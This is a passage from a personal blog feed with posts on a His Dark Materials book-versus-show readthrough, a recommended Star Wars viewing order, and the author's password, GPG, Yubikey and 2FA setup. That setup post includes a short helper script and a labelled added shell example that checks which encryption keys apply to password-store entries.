highlighter-rouge">curve.com</code>, which must have cost them millions. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>Unlike others on the list, vCard is entirely a virtual card, and supports UPI transfers from your credit limit. 
<a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> His Dark Materials Season 1 Readthrough 2020-06-07T00:00:00+00:00 https://captnemo.in/blog/2020/06/07/his-dark-materials <p>A long time ago, I tried to <a href="https://captnemo.in/blog/2011/04/19/game-of-thrones/">do a readthrough</a> for Game of Thrones (Book 1) alongside the first season. I managed to reach Episode 5, before I sped through the rest of the book, but I tried.</p> <p>Trying something similar for His Dark Materials, which is a great series if you’re looking to watch something new. Instead of noting down Chapter/Book equivalence (like I tried last time), going to write down my thoughts here as I’m reading along. <strong>Spoiler Warning</strong> for the entire first season obviously.</p> <h2 id="overall">Overall</h2> <p>The show is very tightly knit with the book with a few over-arching changes from the story-telling perspective:</p> <ul> <li>You get to see other points-of-view, other than just Lyra. Helps establish what else is happening, especially in the other worlds.</li> <li>A lot of infodumps are prevented, or better, broken down into multiple sessions.</li> <li>The major change from the first book is of course showing Will’s PoV and our earth.</li> </ul> <h2 id="chapter-1">Chapter 1</h2> <ul> <li>The opening scene with the great flood sets some context, but isn’t in the books.</li> <li>The Master/Butler chat on the wine poisoning happens much later in the books.</li> <li>There is a lot of foreshadowing around Lyra’s parentage that happens in the first 2 chapters that is entirely missed in the show.</li> </ul> <h2 id="chapter-2">Chapter 2</h2> <ul> <li>The entire Grumman’s skull and hunt sub-plot hasn’t shown up in the book so far (presumably because we only see Lyra’s PoV).</li> <li>The party scene is very well handled (with all the subtle changes for the better. 
Superb acting as well :)</li> <li>The hiding-lyra-in-the-boat scene is merely given a passing mention in the book, but so well done in the show.</li> </ul> <h2 id="chapter-3">Chapter 3</h2> <ul> <li>Splitting Lyra’s parentage reveal (Coulter reveals her father) is a smart move in the show.</li> <li>The show changes Lyra’s kidnappers from Turkish slavers to Gobblers.</li> <li>The Alethiometer reveal happens with both Father Coram and John Fa in the book. The section also has a huge infodump, especially since it involves the parentage reveal. The show breaks it into 3: alethiometer reveal with Father Coram, a previous interrogation of Lyra with John Fa, and Lyra’s parentage reveal (mother) with Ma Costa.</li> </ul> <h2 id="chapter-4">Chapter 4</h2> <ul> <li>The one notable “not-in-the-book” scene is the Coulter’s meeting with Iofur.</li> </ul> <h2 id="chapter-5">Chapter 5</h2> <ul> <li>Interesting to note that the characters of Billy and Roger are fused in both the film and the TV adaptations.</li> </ul> <h2 id="chapter-6">Chapter 6</h2> <ul> <li>Lyra starts a fire in the books, but the show makes it more dramatic by destroying the machine.</li> <li>The balloon ride covers a lot more in the books.</li> </ul> <h2 id="learnings">Learnings</h2> <p>Overall, the show has been nicely adapted so far, and I think there’s a few reasons:</p> <ol> <li>The show barely messes with Lyra’s timeline. Important to ensure this to avoid creating cascading issues down the path.</li> <li>Majority of the changes are either made on kill-able subplots, or side-plots that show us what’s going on elsewhere.</li> <li>And finally, the show spends time on where the medium works best. 
The scaring scene in Chapter 2, for eg.</li> </ol> <p>I’m still sad that the ghosts in the crypt don’t get to be seen, though.</p> Star Wars Beskar Viewing Order 2020-05-04T00:00:00+00:00 https://captnemo.in/star-wars-viewing-order <p>I tweeted out my recommended viewing order for Star Wars recently<sup id="fnref:0" role="doc-noteref"><a href="#fn:0" class="footnote" rel="footnote">1</a></sup>:</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">Happy <a href="https://twitter.com/hashtag/StarWarsDay?src=hash&amp;ref_src=twsrc%5Etfw">#StarWarsDay</a> folks. If you&#39;ve somehow managed to avoid watching Star Wars, here&#39;s my recommended viewing order (No Spoilers, 1/n) <a href="https://t.co/K70O4ydCB7">pic.twitter.com/K70O4ydCB7</a></p>&mdash; Nemo (@captn3m0) <a href="https://twitter.com/captn3m0/status/1257316569949990914?ref_src=twsrc%5Etfw">May 4, 2020</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <p>Thought I should expand a bit on the what and why. Spoilers towards the end (marked). I also went ahead and named it:</p> <h1 id="the-beskar-order">The Beskar Order</h1> <ol> <li>Rogue One: A Star Wars Story</li> <li>Star Wars: Episode IV - A New Hope.</li> <li>Star Wars: Episode V - The Empire Returns</li> <li>Star Wars: Episode VI - Return of the Jedi</li> <li>The Mandalorian (S01E01-04)</li> <li>Star Wars: Episode VII - The Force Awakens</li> <li>The Mandalorian (S01E05-08)</li> </ol> <hr /> <p>If you’ve enjoyed the above, you should pick between the following 2 next:</p> <ol> <li>If you liked the core Skywalker Saga (Episodes IV-VI), and want to explore Anakin’s origins - Go and watch the prequel trilogy (Episode I, II, III).</li> <li>If you liked Force Awakens, you should go finish the sequels (Star Wars Episode VIII, IX)</li> </ol> <p>In either case, I want to leave this as a choice to the viewer. The prequel trilogy has a lot of flaws. 
<a href="https://www.nomachetejuggling.com/2011/11/11/the-star-wars-saga-suggested-viewing-order/">The Machete order</a> famously <em>drops an entire film</em>, and it wasn’t even trying to make room. Go to the prequels if you want to explore the lore. On the flip side, if you liked how Disney handled Episode VII, and want to see closing arcs for the major characters, try the sequels. I wouldn’t recommend interleaving them - it doesn’t get you much and makes it confusing.</p> <p>If you’re still here after finishing both of these (that makes for a total of 10 films and 1 season of telly) - you ought to explore for yourselves. Here’s suggestions depending on what you’d like:</p> <dl> <dt>Clone Wars (TV Series, 7 seasons)</dt> <dd>for exploring the franchise at a less grand scale. There’s an <a href="https://io9.gizmodo.com/the-essential-clone-wars-stories-every-star-wars-fan-sh-1842597580">Essential viewing order</a>, which covers all the major arcs and best episodes.</dd> <dt>The Mandalorian (Season 2, Oct 2020)</dt> <dd>To find out what happens to Baby Yoda</dd> <dt>Star Wars: Rebels (TV Series, 4 Seasons)</dt> <dd>If you want to explore new characters and like something Firefly-esque.</dd> </dl> <p>There are boardgames, RPGs, and some really great books in the franchise as well. Pick what you’d like to explore.</p> <hr /> <h2 id="inspiration">Inspiration</h2> <p>The classic <a href="https://www.nomachetejuggling.com/2011/11/11/the-star-wars-saga-suggested-viewing-order/">Machete Order</a> which does a lot of great things, by skipping a film, preserving tension and plot-twists. Also of note are the <a href="https://www.inverse.com/article/10533-these-are-the-5-best-star-wars-fan-edits">various fan-edits</a>, of which I’ve only ever tried <a href="https://en.wikipedia.org/wiki/The_Phantom_Edit">The Phantom Edit</a>.</p> <h2 id="rationale">Rationale</h2> <p>I tried to optimize for a few things:</p> <ol> <li>Fun while watching the series. 
So good stuff comes first, paired films etc, and intentionally including The Mandalorian.</li> <li>Easy stoppage. In case you don’t like the series, you should be able to stop midway, and still have seen the important/best bits.</li> <li>Sticking to chronological order in the stuff I picked (as much as possible). Sticking to chronology makes it easier to consume.</li> <li>Total time. I don’t want to prescribe a “complete-viewing-order”, but rather a “starting point”.</li> </ol> <p>(1) is easy to optimize for. (2/3) results in things getting thrown around a bit, and (4) means I leave out stuff that you should pick for later.</p> <h2 id="why-not-include-__">Why not include <em>__</em>?</h2> <p>This is not meant to be an exhaustive order, and I was optimizing for total time. Important mentions:</p> <dl> <dt>Solo</dt> <dd>Not really essential viewing.</dd> <dt>Star Wars: The Clone Wars</dt> <dd>The film is terrible (5.9 on IMDB), because it wasn’t meant to be one.</dd> <dt>Star Wars: The Clone Wars TV Series</dt> <dd>I wanted to stick to the main saga, and its just too damn long to recommend casually in any viewing order.</dd> <dt>Star Wars: Holiday Special</dt> <dd>I still can’t bring myself to finish it. It isn’t even canon any more (Life Day is)</dd> <dt>Legends/Resistance</dt> <dd>Again, not essential viewing.</dd> </dl> <h1 id="faq">FAQ</h1> <dl> <dt>Who is this for?</dt> <dd>Recommended for first-time viewers. If you are doing a rewatch, I recommend following <a href="#beskar-machete-order">The Beskar Machete order</a>.</dd> <dt>Have you watched everything Star Wars?</dt> <dd>I can’t even claim to have watched all 12 films, because I couldn’t finish The Clone Wars (movie). I’m still watching Clone Wars (TV series).</dd> <dt>Why Beskar?</dt> <dd>I wanted something that would work well with Machete, for the hybrid order. 
It also makes a point about <em>The Mandalorian</em> <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">2</a></sup> belonging in the order.</dd> <dt>I don’t have this much time!</dt> <dd>I’ve tried to optimize for viewing time already. If you wanna trim further - you’ll be left with just the original trilogy (Episode IV, V, VI). Alternatively, just watch <em>The Mandalorian</em> - it stands very well by itself.</dd> <dt>Did you backdate this post while publishing?</dt> <dd>Yes. I wrote it just a few days after May 4th, and thought it would be nice.</dd> </dl> <hr /> <h2 id="more-rationale-spoilers-ahead">More Rationale (SPOILERS AHEAD)</h2> <p><strong>SPOILERS FROM HERE ONWARDS FOR ALL 12 FILMS. READ AT YOUR OWN PERIL</strong></p> <dl> <dt>Why start with Rogue One?</dt> <dd> <p>Rogue One is a great film, and I love how well it segues into A New Hope. Watching them both back-to-back makes for a great experience. You have this ragged group that has laid down their lives for just a memory chip - and you get to see that bloom into an entire saga. Finishing the original trilogy from there makes sense. The Machete order <a href="https://www.nomachetejuggling.com/2015/12/28/machete-order-update-and-faq/#toc-where-do-episode-vii-and-rogue-one-fit">strongly recommends against starting</a> with Rogue One, but I’ve tried it and it works.</p> </dd> <dt>Why not stick with the Machete order as well?</dt> <dd>The Machete order goes (IV, V, II, III, VI), deciding to leave out Episode I, and wedging Episodes II, III before you see Return of the Jedi. I was optimizing for time here a bit, and I had to leave the prequels as “for-later” in order to make space for the remaining. If you’re doing a rewatch, and aren’t short on time - you can totally follow it. 
This is what it morphs into:<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup> <details> <summary id="beskar-machete-order"><strong>Beskar Machete Order</strong></summary> <ul> <li>Rogue One: A Star Wars Story</li> <li>Star Wars: Episode IV - A New Hope</li> <li>Star Wars: Episode V - The Empire Returns</li> <li>Star Wars: Episode II - Attack of the Clones</li> <li>Star Wars: Episode III - Revenge of the Sith</li> <li>Star Wars: Episode VI - Return of the Jedi</li> <li>The Mandalorian (S01E01-04)</li> <li>Star Wars: Episode VII - The Force Awakens</li> <li>The Mandalorian (S01E05-08)</li> <li>Star Wars: Episode VIII - The Last Jedi</li> <li>Star Wars: Episode IX - The Rise of Skywalker</li> </ul> </details> </dd> <dt>Why add the Mandalorian at all?</dt> <dd>Because frankly - it is both a piece of art, and the best entry into the Star Wars canon in a long time. It also fits into chronological order just after Return of the Jedi - you see how the New Republic has been incompetent, and the ashes of the Empire. You get to experience the power vacuum in the galaxy, which hopefully makes sense before jumping into The Force Awakens and rise of the First Order.</dd> <dt>Why jump to Episode VII (The Force Awakens) instead of finishing The Mandalorian?</dt> <dd>We jump a bit ahead (before finishing The Mandalorian) to “A Force Awakens”, getting to just the start of Rey’s story. This is the only “chronology break” in the order, but has no side-effects<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">4</a></sup>. The reason for the jump (as opposed to finishing The Mandalorian first) is to have a switch in pace. 
While I love The Mandalorian, I think pacing it out makes it better.</dd> <dt>Why keep Episode VII (The Force Awakens) but not the other sequels?</dt> <dd>The best and the worst thing about <em>The Force Awakens</em> is that it is very much “Star Wars”. 
It doesn’t take any risks, sticks to the tropes, and more importantly - it closes mostly as a self-contained film. Yes, there are a few plot-hooks (Rey’s parentage, Luke, Finn’s coma), but given how badly they are resolved in the following films - it seems Disney didn’t have any better idea to the answers than the viewers. It also gives you a “tasting experience” of the sequels. The sequels have always been polarizing, and watching it gives you a better heading to make the choice b/w Prequels/Sequels later on in the order.</dd> </dl> <p>We close with The Mandalorian finale. The Mandalorian isn’t, strictly speaking, essential viewing. While there are hooks, it doesn’t really change anything of consequence to the main saga (at least not in Season 1). But frankly, it is so well made - you deserve to enjoy it. Just look at the trailer:</p> <iframe width="700" height="393" src="https://www.youtube-nocookie.com/embed/aOC8E8z_ifw" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe> <p>If you have feedback, <a href="https://twitter.com/captn3m0">send me a tweet</a>. If you’re reading this in the future, note that this was written in May 2020 and could not include media yet to be published.</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:0" role="doc-endnote"> <p>Happy Star Wars Day! <a href="#fnref:0" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:4" role="doc-endnote"> <p><a href="https://starwars.fandom.com/wiki/Beskar">Beskar</a> is the Star Wars universe’s Vibranium, and features majorly in The Mandalorian as a minor plot device. <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:3" role="doc-endnote"> <p>The arguments against starting with Rogue One don’t even apply to rewatches, so we ignore the Machete Guideline to keep it to the end. 
<a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:1" role="doc-endnote"> <p>In other words, watching <em>The Force Awakens</em> can’t alter the experience of watching the last few episodes of The Mandalorian season 1. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> My Setup: Passwords, 2FA, and Yubikeys 2020-01-04T00:00:00+00:00 https://captnemo.in/blog/2020/01/04/security-setup <p>I upgraded my encryption setup recently, so I thought I should write about it, just in case it is helpful to someone else. As a security professional, I have a different threat model from most folks, and as such my setup does involve a bit more complexity than what I’d recommend to everyone. But if you are an at-risk individual (journalist, person holding hundreds of bitcoins or other digital assets, activist) or if you are a Linux user with a lot of free time - you might consider duplicating some of this.</p> <p><a href="/img/full-keychain.jpg"><img src="/img/keychain-small.jpg" alt="Header Image of my keychain, with a Tile, Yubikey, USB Disk, and house keys" /></a></p> <p>I’ll discuss some of the other approaches I’ve considered, and my thought process around each choice I made. There are general recommendations at the <a href="#what-do-you-recommend-i-use" title="Yes, you can skip the blog post with this link. I won't mind">bottom of the post</a>.</p> <h2 id="passwords">Passwords</h2> <p>I used to be on LastPass till 2017<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">1</a></sup>, when I migrated to <code class="language-plaintext highlighter-rouge">pass</code> (“the standard unix password manager”). 
With pass, each password lives inside of a gpg encrypted file whose filename is the title of the website or resource that requires the password.</p> <p><code class="language-plaintext highlighter-rouge">pass</code> automatically manages a git repository for you, which I sync against GitLab. The one downside of using <code class="language-plaintext highlighter-rouge">pass</code> is that the list of my domains is visible to my hosting provider. <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">2</a></sup> In the past, I’ve set this up against Keybase Encrypted Git (Keybase doesn’t get to see even the file list), and my own git-server (only I get to see it).</p> <p>I don’t push it to GitHub, since most of my stuff lives on GitHub anyway, and I didn’t want to add my passwords there as well. GitLab uptime is decent enough for my use case<sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">3</a></sup>. Finally, my GitLab account is fairly locked down with:</p> <ul> <li>zero integrations or third-party apps</li> <li>no active personal tokens</li> <li>social signin disabled</li> <li>only yubikey SSH key configured</li> </ul> <h3 id="mobile-passwords">Mobile Passwords</h3> <p>There are 2 primary considerations I have:</p> <ol> <li>Using <code class="language-plaintext highlighter-rouge">pass</code> involves GPG keys, and I can’t use hardware GPG keys on my current device (iPhone SE).</li> <li>I don’t want to sync all my passwords to my phone. I have a limited number of applications on my device, and syncing all passwords doesn’t make sense.</li> </ol> <p>For the first issue, I am forced to use a PGP key in software on passforios. 
If you are on Android, take a look at OpenKeychain, and Fidesmo/Yubikey NFC.</p> <p>For the second issue, I use <code class="language-plaintext highlighter-rouge">pass cp</code>, and the <code class="language-plaintext highlighter-rouge">.gpg-id</code> file, which allows me to maintain a <code class="language-plaintext highlighter-rouge">mobile-sync</code> directory inside my pass git repository encrypted against a different key. From the <code class="language-plaintext highlighter-rouge">pass</code> documentation:</p> <h4 id="password-storegpg-id"><code class="language-plaintext highlighter-rouge">~/.password-store/.gpg-id</code></h4> <blockquote> <p>Contains the default gpg key identification used for encryption and decryption. Multiple gpg keys may be specified in this file, one per line. If this file exists in any sub directories, passwords inside those sub directories are encrypted using those keys. This should be set using the init command.</p> </blockquote> <p>My <code class="language-plaintext highlighter-rouge">~/.password-store/mobile-sync/.gpg-id</code> file holds 2 keys: My main encryption key, and the key I’ve configured on my phone.</p> <p>Unfortunately, I haven’t gotten it working well as a git submodule, so I have a helper script that copies the encrypted password files from <code class="language-plaintext highlighter-rouge">mobile-sync</code> subdirectory to a different repository (<code class="language-plaintext highlighter-rouge">mobile-passwords.git</code>). The script is just 2 lines:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cp</span> <span class="nt">-r</span> ~/.password-store/mobile-sync/<span class="k">*</span>.gpg <span class="nb">.</span>
git-sync
</code></pre></div></div> <p>It updates the git repository, and runs a sync to push any local changes to my mobile-passwords repository. I can pull that on my passforios application. 
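</p> <p>The per-directory <code>.gpg-id</code> lookup described above, as an added example that is not part of the original post or of <code>pass</code> itself: it resolves the recipients for an entry from the nearest <code>.gpg-id</code> walking up to the store root, and flags any directory outside <code>mobile-sync</code> that lists the phone's software key. The key IDs, entry names and function names are constructed for illustration.</p>

```bash
# Added example (not from the original post). Key IDs and entries are constructed.

# Print the GPG recipients that apply to ENTRY (path relative to STORE, without
# the .gpg suffix): the nearest .gpg-id found walking up to the store root.
recipients_for() {
    rf_store=${1%/}
    rf_dir=$(dirname "$rf_store/$2")
    while [ "$rf_dir" != "$rf_store" ] && [ "$rf_dir" != "/" ] \
          && [ ! -f "$rf_dir/.gpg-id" ]; do
        rf_dir=$(dirname "$rf_dir")
    done
    [ -f "$rf_dir/.gpg-id" ] || return 1
    # One key ID per line in the file; skip blank lines, join with spaces.
    grep -v '^[[:space:]]*$' "$rf_dir/.gpg-id" | paste -sd ' ' -
}

# Print every directory (relative to STORE) outside ALLOWED_DIR whose .gpg-id
# names PHONE_KEY. Returns 1 if any exist, 0 if the key is confined.
phone_key_leaks() {
    pk_store=${1%/}; pk_key=$2; pk_allowed=$3
    pk_leaks=$(find "$pk_store" -name .gpg-id -type f | while IFS= read -r pk_f; do
        pk_rel=${pk_f#"$pk_store"/}
        case "$pk_rel" in
            "$pk_allowed"/*) continue ;;   # the directory meant for the phone
        esac
        if grep -qxF -e "$pk_key" "$pk_f"; then dirname "$pk_rel"; fi
    done | sort)
    [ -z "$pk_leaks" ] && return 0
    printf '%s\n' "$pk_leaks"
    return 1
}

# Build a throwaway store shaped like the one in the post: a main key at the
# root, main key plus phone key under mobile-sync. Prints the store path.
build_sample_store() {
    bs_dir=$(mktemp -d)
    mkdir -p "$bs_dir/mobile-sync" "$bs_dir/work/vpn"
    printf '%s\n' MAINKEY0000000001 > "$bs_dir/.gpg-id"
    printf '%s\n' MAINKEY0000000001 PHONEKEY000000002 > "$bs_dir/mobile-sync/.gpg-id"
    : > "$bs_dir/gitlab.com.gpg"
    : > "$bs_dir/mobile-sync/bank.gpg"
    : > "$bs_dir/work/vpn/corp.gpg"
    printf '%s\n' "$bs_dir"
}

# Demo: show which keys each entry is encrypted to, then run the audit.
demo_store=$(build_sample_store)
for demo_entry in gitlab.com mobile-sync/bank work/vpn/corp; do
    printf '%-18s -> %s\n' "$demo_entry" "$(recipients_for "$demo_store" "$demo_entry")"
done
phone_key_leaks "$demo_store" PHONEKEY000000002 mobile-sync \
    && echo "phone key is only a recipient under mobile-sync"
rm -rf "$demo_store"
```

<p>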
I could also clone the entire repo, but the iOS app doesn’t work nicely with a single-subdirectory approach.</p> <h2 id="gpg">GPG</h2> <p><code class="language-plaintext highlighter-rouge">pass</code> relies on GPG, and as such I require a strong key setup. I have the following:</p> <ol> <li>2xYubikey 4 (Doesn’t have NFC)</li> <li>Fidesmo Smartcard, currently unused</li> </ol> <p>Both the Yubikeys are configured against my GPG Encryption key. I carry one of the Yubikeys on my keyring with me. The backup Yubikey stays at my home.</p> <p>I followed <a href="https://github.com/drduh/YubiKey-Guide#multiple-keys">this guide</a> while configuring the same. As of now, switching between keys is not very user-friendly, but future <a href="https://dev.gnupg.org/T2291">GnuPG versions plan to fix it</a>. The Yubikey holds:</p> <ul> <li>An encryption key</li> <li>A signing key</li> <li>An authentication key</li> </ul> <p>I keep a copy of all these keys using <a href="https://wiki.archlinux.org/index.php/Paperkey">paperkey</a> as per the same guide. I have a subkey backup as well, since Yubikeys are known to fail<sup id="fnref:8" role="doc-noteref"><a href="#fn:8" class="footnote" rel="footnote">4</a></sup>.</p> <h2 id="ssh">SSH</h2> <p>The Authentication key in my Yubikey is configured for SSH. 
I just need to ensure that my GPG agent is configured for SSH as well:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">GPG_TTY</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">tty</span><span class="si">)</span><span class="s2">"</span>
<span class="nb">export </span><span class="nv">SSH_AUTH_SOCK</span><span class="o">=</span><span class="si">$(</span>gpgconf <span class="nt">--list-dirs</span> agent-ssh-socket<span class="si">)</span>
gpgconf <span class="nt">--launch</span> gpg-agent
</code></pre></div></div> <h2 id="u2f">U2F</h2> <p>U2F lets me use a physical key as my second-factor on supported websites (as an alternative to SMS/TOTP). I configure both of my Yubikeys for U2F wherever possible (Twitter/AWS are notable exceptions and only support a single key). U2F support for OpenSSH is coming soon. So you can soon authenticate to your server with the Yubikey+PIN, and finish the 2FA with U2F by tapping the key<sup id="fnref:11" role="doc-noteref"><a href="#fn:11" class="footnote" rel="footnote">5</a></sup>.</p> <h2 id="root-of-identity">Root-of-Identity</h2> <p>For most people, the root of identity comes down to ownership of their email address. As such, it is very often the juiciest target for most attackers. I run my mail against <a href="https://www.migadu.com">Migadu</a>, a privacy-friendly Swiss email-hosting service. They provide me a management layer for managing my domains which uses my GMail account. (See FAQ for why). I also have 2FA (TOTP only) configured on the Migadu management setup.</p> <p>The domain is currently registered at an Indian registrar (which doesn’t offer U2F, but I do have TOTP configured). 
I would have moved this to CloudFlare, but CloudFlare doesn’t support the <code class="language-plaintext highlighter-rouge">.in</code> TLD yet.<sup id="fnref:6" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">6</a></sup></p> <p>The email address used for registering the domain again is my GMail. My DNS is configured on CloudFlare, which again uses my GMail and has appropriate 2FA configured. (It doesn’t support U2F). So here’s the list of critical providers:</p> <table> <thead> <tr> <th>Provider</th> <th>What can an attacker do</th> <th>Auth</th> <th>2FA</th> </tr> </thead> <tbody> <tr> <td>Registrar/Mitsu</td> <td>Change my nameserver, read any future email, reset passwords</td> <td>GMail/Password</td> <td>TOTP</td> </tr> <tr> <td>DNS/CloudFlare</td> <td>Change my MX records, read any future emails, reset passwords</td> <td>GMail/Password</td> <td>TOTP</td> </tr> <tr> <td>Email/Migadu</td> <td>Reset my email password, read my current emails, reset passwords</td> <td>GMail/Password</td> <td>TOTP</td> </tr> <tr> <td>GMail</td> <td>Reset passwords for the above 3 accounts</td> <td>Email/Password</td> <td>U2F</td> </tr> </tbody> </table> <p>As you can see, I end up trusting GMail a lot here.</p> <h2 id="recoverybackup-codes-and-security-questions">Recovery/Backup codes and Security Questions</h2> <p>I use randomly generated UUIDs as answers to security questions. Currently, I’m storing these for various services within the same password store. As it stands, I can’t get access to my password OR recovery token without my Yubikey and PIN. 
The access matrix looks like this:</p> <table> <thead> <tr> <th>What</th> <th>Physical Access</th> <th>Additional Authentication</th> </tr> </thead> <tbody> <tr> <td>Password</td> <td>Yubikey</td> <td>PIN</td> </tr> <tr> <td>U2F-2FA</td> <td>Yubikey</td> <td>Physical touch</td> </tr> <tr> <td>TOTP</td> <td>Phone</td> <td>TouchID</td> </tr> <tr> <td>Recovery Code</td> <td>Yubikey</td> <td>PIN</td> </tr> <tr> <td>Security Question answers</td> <td>Yubikey</td> <td>PIN</td> </tr> </tbody> </table> <h2 id="failure-scenarios">Failure Scenarios</h2> <p>There are lots of failure scenarios with such a setup, and while I’ve got a pretty spotless record of not getting hacked - I’m not immune to screwups. Here’s all the bad things that can happen:</p> <h3 id="yubikey-failures">Yubikey failures</h3> <p>If my Yubikey fails (or if I forget its PIN), I can’t access passwords on my device. I still have access to commonly used passwords and my mail on my phone. My backup Yubikey is kept safely at my home. If I lose both, I have the paperkey backup at home (which I should store elsewhere).</p> <h3 id="device-failures">Device failures</h3> <p>I have a current version of the password repository against 3 PCs, and a partial version in my mobile. If all these 4 devices fail at once, I can still clone a fresh version of the repository with my YubiKey (I would still have GitLab SSH access). I might need to prepare better for this though, since configuring GPG-SSH might not always be easy during an incident.</p> <p>As an alternate scenario, my phone GPG key does have my GitLab password, so I can clone the repo over HTTPS (with password) if needed.</p> <h3 id="circular-dependency-against-gitlab">Circular dependency against GitLab</h3> <p>My GitLab password is randomly generated and stored in the same password store on GitLab. 
That is not too big of an issue, because I don’t need the GitLab password anymore to clone my passwords repo, just my Yubikey (for SSH).</p> <h3 id="lost-key">Lost Key</h3> <p>If I lose my key, the GPG card contains public info, including my email address, which can be used to contact me. I have a Tile bluetooth tracker on my keychain to make it easier for me to find it.</p> <h3 id="malware">Malware</h3> <p>A hardware key doesn’t protect you from all attacks. At the end of the day, my passwords must be decrypted by the key and passed unencrypted back to my browser (or editor). <code class="language-plaintext highlighter-rouge">pass</code>, for example, doesn’t protect against memory scraping attacks. If I edit a password on an infected machine, it gets that password.</p> <p>If my browser has a malicious extension, it already has keys to the kingdom. But if I then log into a website, it does get access to that password additionally.</p> <p>xkcd 1200 famously illustrates this:</p> <p><a href="https://xkcd.com/1200/"><img src="https://imgs.xkcd.com/comics/authorization_2x.png" alt="xkcd 1200" /></a></p> <p>A password vault protected by a hardware key protects against some attacks:</p> <ul> <li>A malicious extension can’t sniff my vault passphrase, since I don’t have one</li> <li>The key can’t be exfiltrated from hardware.</li> </ul> <p>However, malware can connect to my authenticated GPG socket, and start decrypting things. To protect against that, I run my Yubikey in “touch-only” mode, so it requires a “physical touch” before it actually does anything, even if the PIN is cached. Customizability is <a href="https://support.yubico.com/hc/en-us/articles/360016614940-YubiKey-Manager-CLI-ykman-User-Manual">dependent on your Yubikey model</a>. But remember the xkcd warning - if I have malware running on my device, it is pretty much game over anyway. 
<code class="language-plaintext highlighter-rouge">pass</code> doesn’t prevent against memory scraping attacks, and actually uses <code class="language-plaintext highlighter-rouge">/dev/shm</code> to store the temporary plain-text files containing passwords. Ultimately, your identity is as secure as the device you trust it with.</p> <h2 id="improvements">Improvements</h2> <p>If you have any suggestions for any of the below, I’m <a href="/contact">happy to hear them</a>.</p> <h3 id="travel-plans">Travel Plans</h3> <p>Since my backup key stays at home, how do I deal with long-term travel? This is something I’m still figuring out. Do I take my backup Yubikey on my longer-travels? Or should I setup a third-key before I do that? Chances of me losing both the keys together are quite high, so I’m trying to avoid that.</p> <h3 id="domain-ownership">Domain Ownership</h3> <p>I’d like to transfer my domain to <a href="https://twofactorauth.org/#domains">a registrar that supports U2F</a>, likely Namecheap since I already own some domains there<sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">7</a></sup>. If you use CloudFlare, they should roll out <a href="https://community.cloudflare.com/t/u2f-for-logins/17583/34">U2F support soon</a>.</p> <h3 id="2fa-recovery-guides">2FA Recovery Guides</h3> <p>I wish more organizations published what they consider as valid 2FA recovery mechanisms. GitHub supports 2FA recovery by proof of SSH keys or Personal Tokens; Migadu just needs a few domain names from your account, and lots of services require proof-of-identity.</p> <p>A lot of this is undocumented, and I wish organizations were more public about this so users can take appropriate measures and understand their risk better.</p> <h3 id="fidesmo-card">Fidesmo Card</h3> <p>I’m planning to configure my Fidesmo card against my existing GPG/SSH key, so it stays in my wallet to improve redundancy. 
Unfortunately, it is not supported on iOS, so I plan to get an NFC reader/writer and test that out. This also helps with travel plans a bit, since I’m less likely to lose my wallet anecdotally (which also has <a href="https://www.thetileapp.com/en-us/store/tiles/slim" title="I have the older version of the Tile Slim">a bluetooth tracker</a>).</p> <h3 id="u2f-on-iphone">U2F on iPhone</h3> <p>U2F support on Mobile Safari is non-existent. Brave recently added support for the upcoming Yubikey 5Ci, which supports both USB-C and lightning. However, this requires a special Yubikey SDK, which breaks the idea of U2F being interoperable. The 5Ci is also quite costly at $70. I don’t know of any application that is actually supporting GPG-over-Yubikey-over-lightning.</p> <p>Compare this to Android where NFC based smartcards or Yubikeys just work. I’d like that to happen with iPhones.</p> <h3 id="full-disk-encryption-using-a-yubikey">Full Disk Encryption using a Yubikey</h3> <p>It is possible to configure <a href="https://github.com/agherzan/yubikey-full-disk-encryption">Full Disk Encryption with Yubikeys</a>, but I haven’t tried it yet.</p> <h3 id="2fa-on-my-email-account">2FA on my email account</h3> <p>Migadu currently <em>does not support 2FA on webmail access</em>, just on <code class="language-plaintext highlighter-rouge">manage.migadu.com</code>. This is very unfortunate, but I’m told this is planned soon (January 2020).</p> <h3 id="recoverybackup-codes-and-security-questions-1">Recovery/Backup codes and Security Questions</h3> <p>My current setup of saving recovery codes alongside passwords isn’t optimal, but I don’t have a better way either. I’ve considered keeping my recovery codes on an alternate password store (such as bitwarden, or KeePassX), but I’ll have to memorize the password, and set up a separate 2FA for it to be truly fault-tolerant.</p> <h2 id="faq">FAQ</h2> <h3 id="why-do-you-have-stuff-configured-on-your-gmail-arent-you-anti-google">Why do you have stuff configured on your GMail? 
